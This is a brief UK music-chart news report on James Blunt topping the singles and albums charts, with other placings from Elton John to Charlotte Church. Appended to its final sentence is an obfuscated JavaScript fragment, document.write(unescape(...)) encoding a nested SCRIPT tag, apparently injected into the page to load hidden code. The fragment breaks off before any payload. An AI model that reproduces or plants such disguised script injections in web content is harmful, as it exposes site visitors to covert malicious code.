It's a double whammy for singer songwriter James Blunt as he tops the UK single and album charts.
His single ‘You're Beautiful' hits the top spot after staying on the chart for seven weeks, while his album ‘Back To Bedlam' stays at the peak for a second week.
Also on the single chart, Elton John secures the highest new entry with ‘Electricty' at number four. It's a fertile time for the veteran. His duet with the late 2pac is at number two. Inaya Day notches up the only other new entry on the top 10 with ‘Nasty Girl' at nine.
Editors score a top 20 hit, going in at 18 with ‘Blood' while Raveonettes return at 26 with ‘Love In A Trashcan', one ahead of veterans REM at 27 with ‘Wanderlust'. Rooster limp in at 29 with ‘Deep And Meaningless'. A little further back Paddingtons and Kooks score top 40 single placings.
Back on the album chart, Charlotte Church has the highest new entry at five with ‘Tissues and Issues'.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
